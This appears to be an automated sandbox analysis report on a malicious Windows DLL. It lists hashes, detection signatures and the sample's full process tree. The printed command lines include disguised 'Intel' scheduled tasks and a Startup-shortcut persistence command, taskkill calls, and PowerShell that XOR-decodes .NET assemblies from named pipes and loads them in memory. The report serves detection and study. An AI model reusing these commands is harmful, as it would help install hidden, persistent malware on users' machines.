Windows
Analysis Report
JkICQ13OOY.dll
Overview
General Information

| Field | Value |
|---|---|
| Sample name | JkICQ13OOY.dll (renamed file extension from exe to dll, renamed because original name is a hash value) |
| Original sample name | c6aad319fcaa6c5f87dc49805d5e287f1870e61e0b93e17b4da556865c212e25.dll.exe |
| Analysis ID | 1576677 |
| MD5 | cf174c5741c4dce62fb76c183b5b36d5 |
| SHA1 | b982d92cac5d045a983b16033c701e59be93f133 |
| SHA256 | c6aad319fcaa6c5f87dc49805d5e287f1870e61e0b93e17b4da556865c212e25 |
| Tags | exeuser-JAMESWT_MHT |

Detection

| Field | Value |
|---|---|
| Score | 80 |
| Range | 0 - 100 |
| Whitelisted | false |
| Confidence | 100% |
Signatures
System process connects to network (likely due to code injection or exploit)
AI detected suspicious sample
Bypasses PowerShell execution policy
Powershell creates an autostart link
Sigma detected: Potential Startup Shortcut Persistence Via PowerShell.EXE
Sigma detected: Potentially Suspicious PowerShell Child Processes
Suspicious powershell command line found
Uses schtasks.exe or at.exe to add and modify task schedules
Windows shortcut file (LNK) contains suspicious command line arguments
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains sections with non-standard names
PE file contains strange resources
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Potential Dosfuscation Activity
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Schtasks From Env Var Folder
Stores files to the Windows start menu directory
Uses code obfuscation techniques (call, push, ret)
Uses taskkill to terminate processes
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Classification
- System is w10x64
- loaddll64.exe (PID: 2792, MD5: 763455F9DCB24DFEECC2B9D9F8D46D52) cmdline: loaddll64.exe "C:\Users\user\Desktop\JkICQ13OOY.dll"
- conhost.exe (PID: 2052, MD5: 0D698AF330FD17BEE3BF90011D49251D) cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
- cmd.exe (PID: 6720, MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\JkICQ13OOY.dll",#1
- rundll32.exe (PID: 4232, MD5: EF3179D498793BF4234F708D3BE28633) cmdline: rundll32.exe "C:\Users\user\Desktop\JkICQ13OOY.dll",#1
- rundll32.exe (PID: 2192, MD5: EF3179D498793BF4234F708D3BE28633) cmdline: rundll32.exe C:\Users\user\Desktop\JkICQ13OOY.dll,DllMainer
- rundll32.exe (PID: 5156, MD5: EF3179D498793BF4234F708D3BE28633) cmdline: rundll32.exe C:\Users\user\Desktop\JkICQ13OOY.dll,DllMainerInstall
- taskkill.exe (PID: 4508, MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7) cmdline: "taskkill" /F /IM powershell.exe
- conhost.exe (PID: 6656, MD5: 0D698AF330FD17BEE3BF90011D49251D) cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
- schtasks.exe (PID: 6936, MD5: 76CD6626DD8834BD4A42E6A565104DC2) cmdline: "schtasks.exe" /Delete /TN IntelProfileUpdater_Helper /F
- conhost.exe (PID: 5796, MD5: 0D698AF330FD17BEE3BF90011D49251D) cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
- schtasks.exe (PID: 5728, MD5: 76CD6626DD8834BD4A42E6A565104DC2) cmdline: "schtasks.exe" /Delete /TN IntelProfileUpdater_OnLogOnDaily /F
- conhost.exe (PID: 988, MD5: 0D698AF330FD17BEE3BF90011D49251D) cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
- powershell.exe (PID: 3560, MD5: 04029E121A0CFA5991749937DD22A1D9) cmdline: "powershell.exe" -ExecutionPolicy Bypass -Command "schtasks /create /tn \"IntelProfileUpdater_OnLogOnDaily\" /xml \"C:\Users\user\AppData\Local\task.xml\""
- conhost.exe (PID: 5636, MD5: 0D698AF330FD17BEE3BF90011D49251D) cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
- schtasks.exe (PID: 7200, MD5: 76CD6626DD8834BD4A42E6A565104DC2) cmdline: "C:\Windows\system32\schtasks.exe" /create /tn IntelProfileUpdater_OnLogOnDaily /xml C:\Users\user\AppData\Local\task.xml
- powershell.exe (PID: 7236, MD5: 04029E121A0CFA5991749937DD22A1D9) cmdline: "powershell.exe" -ExecutionPolicy Bypass -Command "schtasks /create /tn \"IntelProfileUpdater_Helper\" /xml \"C:\Users\user\AppData\Local\task.xml\""
- conhost.exe (PID: 7244, MD5: 0D698AF330FD17BEE3BF90011D49251D) cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
- schtasks.exe (PID: 7452, MD5: 76CD6626DD8834BD4A42E6A565104DC2) cmdline: "C:\Windows\system32\schtasks.exe" /create /tn IntelProfileUpdater_Helper /xml C:\Users\user\AppData\Local\task.xml
- rundll32.exe (PID: 7340, MD5: EF3179D498793BF4234F708D3BE28633) cmdline: rundll32.exe C:\Users\user\Desktop\JkICQ13OOY.dll,DllMainerInstallUserOnly
- taskkill.exe (PID: 7492, MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7) cmdline: "taskkill" /F /IM powershell.exe
- conhost.exe (PID: 7500, MD5: 0D698AF330FD17BEE3BF90011D49251D) cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
- powershell.exe (PID: 7552, MD5: 04029E121A0CFA5991749937DD22A1D9) cmdline: "powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command $WScriptShell = New-Object -ComObject WScript.Shell $Shortcut = $WScriptShell.CreateShortcut('C:\Users\user\AppData\Roaming/Microsoft/Windows/Start Menu/Programs/Startup/IntelManagementuser.lnk') $Shortcut.TargetPath = 'powershell.exe' $Shortcut.Description = 'The Intel Management user (ME) is an embedded microcontroller running on a dedicated microprocessor integrated into Intel chipsets.' $Shortcut.Arguments = '-NoProfile -ExecutionPolicy Bypass -Command C:\Windows\System32\rundll32.exe "C:\Users\user\AppData\Roaming/IntelManagementUnit/Mainer.dll",DllMainerUserOnly' $Shortcut.WindowStyle = 7 $Shortcut.Save()
- conhost.exe (PID: 7560, MD5: 0D698AF330FD17BEE3BF90011D49251D) cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
- rundll32.exe (PID: 7688, MD5: EF3179D498793BF4234F708D3BE28633) cmdline: rundll32.exe "C:\Users\user\Desktop\JkICQ13OOY.dll",DllMainer
- rundll32.exe (PID: 7696, MD5: EF3179D498793BF4234F708D3BE28633) cmdline: rundll32.exe "C:\Users\user\Desktop\JkICQ13OOY.dll",DllMainerInstall
- taskkill.exe (PID: 7524, MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7) cmdline: "taskkill" /F /IM powershell.exe
- conhost.exe (PID: 7284, MD5: 0D698AF330FD17BEE3BF90011D49251D) cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
- schtasks.exe (PID: 3784, MD5: 76CD6626DD8834BD4A42E6A565104DC2) cmdline: "schtasks.exe" /Delete /TN IntelProfileUpdater_Helper /F
- conhost.exe (PID: 2812, MD5: 0D698AF330FD17BEE3BF90011D49251D) cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
- schtasks.exe (PID: 7208, MD5: 76CD6626DD8834BD4A42E6A565104DC2) cmdline: "schtasks.exe" /Delete /TN IntelProfileUpdater_OnLogOnDaily /F
- conhost.exe (PID: 8100, MD5: 0D698AF330FD17BEE3BF90011D49251D) cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
- powershell.exe (PID: 7280, MD5: 04029E121A0CFA5991749937DD22A1D9) cmdline: "powershell.exe" -ExecutionPolicy Bypass -Command "schtasks /create /tn \"IntelProfileUpdater_OnLogOnDaily\" /xml \"C:\Users\user\AppData\Local\task.xml\""
- conhost.exe (PID: 7284, MD5: 0D698AF330FD17BEE3BF90011D49251D) cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
- schtasks.exe (PID: 8068, MD5: 76CD6626DD8834BD4A42E6A565104DC2) cmdline: "C:\Windows\system32\schtasks.exe" /create /tn IntelProfileUpdater_OnLogOnDaily /xml C:\Users\user\AppData\Local\task.xml
- powershell.exe (PID: 7868, MD5: 04029E121A0CFA5991749937DD22A1D9) cmdline: "powershell.exe" -ExecutionPolicy Bypass -Command "schtasks /create /tn \"IntelProfileUpdater_Helper\" /xml \"C:\Users\user\AppData\Local\task.xml\""
- conhost.exe (PID: 7948, MD5: 0D698AF330FD17BEE3BF90011D49251D) cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
- schtasks.exe (PID: 7272, MD5: 76CD6626DD8834BD4A42E6A565104DC2) cmdline: "C:\Windows\system32\schtasks.exe" /create /tn IntelProfileUpdater_Helper /xml C:\Users\user\AppData\Local\task.xml
- rundll32.exe (PID: 7704, MD5: EF3179D498793BF4234F708D3BE28633) cmdline: rundll32.exe "C:\Users\user\Desktop\JkICQ13OOY.dll",DllMainerInstallUserOnly
- taskkill.exe (PID: 7104, MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7) cmdline: "taskkill" /F /IM powershell.exe
- conhost.exe (PID: 3620, MD5: 0D698AF330FD17BEE3BF90011D49251D) cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
- powershell.exe (PID: 7300, MD5: 04029E121A0CFA5991749937DD22A1D9) cmdline: "powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command $WScriptShell = New-Object -ComObject WScript.Shell $Shortcut = $WScriptShell.CreateShortcut('C:\Users\user\AppData\Roaming/Microsoft/Windows/Start Menu/Programs/Startup/IntelManagementuser.lnk') $Shortcut.TargetPath = 'powershell.exe' $Shortcut.Description = 'The Intel Management user (ME) is an embedded microcontroller running on a dedicated microprocessor integrated into Intel chipsets.' $Shortcut.Arguments = '-NoProfile -ExecutionPolicy Bypass -Command C:\Windows\System32\rundll32.exe "C:\Users\user\AppData\Roaming/IntelManagementUnit/Mainer.dll",DllMainerUserOnly' $Shortcut.WindowStyle = 7 $Shortcut.Save()
- conhost.exe (PID: 2716, MD5: 0D698AF330FD17BEE3BF90011D49251D) cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
- rundll32.exe (PID: 7720, MD5: EF3179D498793BF4234F708D3BE28633) cmdline: rundll32.exe "C:\Users\user\Desktop\JkICQ13OOY.dll",Dummy
- rundll32.exe (PID: 7732, MD5: EF3179D498793BF4234F708D3BE28633) cmdline: rundll32.exe "C:\Users\user\Desktop\JkICQ13OOY.dll",DotNetRuntimeDebugHeader
- WerFault.exe (PID: 2444, MD5: FD27D9F6D02763BDE32511B5DF7FF7A0) cmdline: C:\Windows\system32\WerFault.exe -u -p 7732 -s 380
- rundll32.exe (PID: 7744, MD5: EF3179D498793BF4234F708D3BE28633) cmdline: rundll32.exe "C:\Users\user\Desktop\JkICQ13OOY.dll",DllMainerUserOnly
- powershell.exe (PID: 7564, MD5: 04029E121A0CFA5991749937DD22A1D9) cmdline: "powershell.exe" -ExecutionPolicy Bypass -Command "Write-Host 'Dummy process started. Press Ctrl+C to exit.'; while ($true) { try { Start-Sleep -Seconds 1 } catch { Write-Host 'Close signal received. Exiting...'; break } }"
- conhost.exe (PID: 7240, MD5: 0D698AF330FD17BEE3BF90011D49251D) cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
- powershell.exe (PID: 7904, MD5: 04029E121A0CFA5991749937DD22A1D9) cmdline: "powershell.exe" -ExecutionPolicy Bypass -Command "function Load-Assembly($asmBytes) { # XOR the assembly byte array $xorKey = 164 [byte[]] $decodedBytes = New-Object byte[] $asmBytes.Length for ($i = 0; $i -lt $asmBytes.Length; $i++) { $decodedBytes[$i] = $asmBytes[$i] -bxor $xorKey } # Load the assembly from the modified byte array $assembly = [System.Reflection.Assembly]::Load($decodedBytes) # Search for a Program class and a Main method to invoke $programType = $assembly.GetType(\"Program\", $false) if ($programType -ne $null) { $mainMethod = $programType.GetMethod(\"Main\", [System.Reflection.BindingFlags] \"Static,Public,NonPublic\") if ($mainMethod -ne $null -and $mainMethod.GetParameters().Length -eq 1 -and $mainMethod.GetParameters()[0].ParameterType -eq [string[]]) { $arguments = [System.String[]]@(\"--powershell\") $mainMethod.Invoke($null, [System.Object[]]@(,$arguments)) } else { #throw \"No entry point found.\"; } } else { #throw \"Program class not found.\"; } } $a = [System.Reflection.Assembly]::LoadFrom(\"C:\Users\user\AppData\Roaming\IntelManagementUnit\FSharp.Core.All.dll\"); $in_pipe = New-Object System.IO.Pipes.NamedPipeClientStream(\"GLSXQXRVFAHVDEQYPRSDVGLAEEFHUSGJKSWIUJCYTRNPAMDOUHMAIYAEEBPXFFTUYFACQTGLCVYRNSSHYWFWFOKLAJSVUCDOKGIGITRSISPPMSNOBNSJHLJGXIPDNLBS\"); $in_pipe.Connect(); # Get the current process ID $processId = [System.Diagnostics.Process]::GetCurrentProcess().Id # Convert the process ID to byte array $bytes = [System.BitConverter]::GetBytes($processId) # Assuming $in_pipe is a System.IO.Pipes.PipeStream or similar # You would write the byte array to it like this: $in_pipe.Write($bytes, 0, $bytes.Length) $in_pipe.Flush() $buffer = new-object byte[] 98616;$rrrr=$in_pipe.Read($buffer, 0, $buffer.Length);$aaaa=Load-Assembly($buffer);;;;$buffer = new-object byte[] 156160;$rrrr=$in_pipe.Read($buffer, 0, $buffer.Length);$aaaa=Load-Assembly($buffer);;;;$buffer = new-object byte[] 21504;$rrrr=$in_pipe.Read($buffer, 0, $buffer.Length);$aaaa=Load-Assembly($buffer);;;;"
- conhost.exe (PID: 7952, MD5: 0D698AF330FD17BEE3BF90011D49251D) cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
- powershell.exe (PID: 1012, MD5: 04029E121A0CFA5991749937DD22A1D9) cmdline: "powershell.exe" -ExecutionPolicy Bypass -Command "function Load-Assembly($asmBytes) { # XOR the assembly byte array $xorKey = 164 [byte[]] $decodedBytes = New-Object byte[] $asmBytes.Length for ($i = 0; $i -lt $asmBytes.Length; $i++) { $decodedBytes[$i] = $asmBytes[$i] -bxor $xorKey } # Load the assembly from the modified byte array $assembly = [System.Reflection.Assembly]::Load($decodedBytes) # Search for a Program class and a Main method to invoke $programType = $assembly.GetType(\"Program\", $false) if ($programType -ne $null) { $mainMethod = $programType.GetMethod(\"Main\", [System.Reflection.BindingFlags] \"Static,Public,NonPublic\") if ($mainMethod -ne $null -and $mainMethod.GetParameters().Length -eq 1 -and $mainMethod.GetParameters()[0].ParameterType -eq [string[]]) { $arguments = [System.String[]]@(\"--powershell\") $mainMethod.Invoke($null, [System.Object[]]@(,$arguments)) } else { #throw \"No entry point found.\"; } } else { #throw \"Program class not found.\"; } } $a = [System.Reflection.Assembly]::LoadFrom(\"C:\Users\user\AppData\Roaming\IntelManagementUnit\FSharp.Core.All.dll\"); $in_pipe = New-Object System.IO.Pipes.NamedPipeClientStream(\"LXUACJGCHJQDEYDGSNQXYJQGFJMGQKRJPWRHKFILVEKMQAQLQIGQRGMOGMXGBBDBLKMWPJKULMBQPXWHUFCXYTKCBESBUWOKFPHBSEPSYYAUBJXTYXPNJDXVBPCECGSP\"); $in_pipe.Connect(); # Get the current process ID $processId = [System.Diagnostics.Process]::GetCurrentProcess().Id # Convert the process ID to byte array $bytes = [System.BitConverter]::GetBytes($processId) # Assuming $in_pipe is a System.IO.Pipes.PipeStream or similar # You would write the byte array to it like this: $in_pipe.Write($bytes, 0, $bytes.Length) $in_pipe.Flush() $buffer = new-object byte[] 98616;$rrrr=$in_pipe.Read($buffer, 0, $buffer.Length);$aaaa=Load-Assembly($buffer);;;;$buffer = new-object byte[] 156160;$rrrr=$in_pipe.Read($buffer, 0, $buffer.Length);$aaaa=Load-Assembly($buffer);;;;$buffer = new-object byte[] 18944;$rrrr=$in_pipe.Read($buffer, 0, $buffer.Length);$aaaa=Load-Assembly($buffer);;;;"
- conhost.exe (PID: 5692, MD5: 0D698AF330FD17BEE3BF90011D49251D) cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
- powershell.exe (PID: 4188, MD5: 04029E121A0CFA5991749937DD22A1D9) cmdline: "powershell.exe" -ExecutionPolicy Bypass -Command "function Load-Assembly($asmBytes) { # XOR the assembly byte array $xorKey = 164 [byte[]] $decodedBytes = New-Object byte[] $asmBytes.Length for ($i = 0; $i -lt $asmBytes.Length; $i++) { $decodedBytes[$i] = $asmBytes[$i] -bxor $xorKey } # Load the assembly from the modified byte array $assembly = [System.Reflection.Assembly]::Load($decodedBytes) # Search for a Program class and a Main method to invoke $programType = $assembly.GetType(\"Program\", $false) if ($programType -ne $null) { $mainMethod = $programType.GetMethod(\"Main\", [System.Reflection.BindingFlags] \"Static,Public,NonPublic\") if ($mainMethod -ne $null -and $mainMethod.GetParameters().Length -eq 1 -and $mainMethod.GetParameters()[0].ParameterType -eq [string[]]) { $arguments = [System.String[]]@(\"--powershell\") $mainMethod.Invoke($null, [System.Object[]]@(,$arguments)) } else { #throw \"No entry point found.\"; } } else { #throw \"Program class not found.\"; } } $a = [System.Reflection.Assembly]::LoadFrom(\"C:\Users\user\AppData\Roaming\IntelManagementUnit\FSharp.Core.All.dll\"); $in_pipe = New-Object System.IO.Pipes.NamedPipeClientStream(\"MKVJMXBCRWWOUVEMTDUWQIHXBQGAJWWVNHRKQRRWQFJJKQLQDUAMSCSMTRQMPIGQMRUXJCBJAWINPSYTEBWUSBXLEFTCFYAERPGJYGUJVRKAINIJYABRUTKDFRYTLNAF\"); $in_pipe.Connect(); # Get the current process ID $processId = [System.Diagnostics.Process]::GetCurrentProcess().Id # Convert the process ID to byte array $bytes = [System.BitConverter]::GetBytes($processId) # Assuming $in_pipe is a System.IO.Pipes.PipeStream or similar # You would write the byte array to it like this: $in_pipe.Write($bytes, 0, $bytes.Length) $in_pipe.Flush() $buffer = new-object byte[] 98616;$rrrr=$in_pipe.Read($buffer, 0, $buffer.Length);$aaaa=Load-Assembly($buffer);;;;$buffer = new-object byte[] 3887104;$rrrr=$in_pipe.Read($buffer, 0, $buffer.Length);$aaaa=Load-Assembly($buffer);;;;"
- conhost.exe (PID: 4208, MD5: 0D698AF330FD17BEE3BF90011D49251D) cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
- rundll32.exe (PID: 7756, MD5: EF3179D498793BF4234F708D3BE28633) cmdline: rundll32.exe "C:\Users\user\Desktop\JkICQ13OOY.dll",DllMainerSmartAndSilent
- rundll32.exe (PID: 7680, MD5: EF3179D498793BF4234F708D3BE28633) cmdline: rundll32.exe Mainer.dll,Dummy
- svchost.exe (PID: 7612, MD5: B7F884C1B74A263F746EE12A5F7C9F6A) cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
- cleanup
No configs have been found
No yara matches
System Summary

Sigma rule sources:
- Source: Author: Christopher Peacock '@securepeacock', SCYTHE:
- Source: Author: Florian Roth (Nextron Systems), Tim Shelton:
- Source: Author: frack113:
- Source: Author: frack113, Nasreddine Bencherchali (Nextron Systems):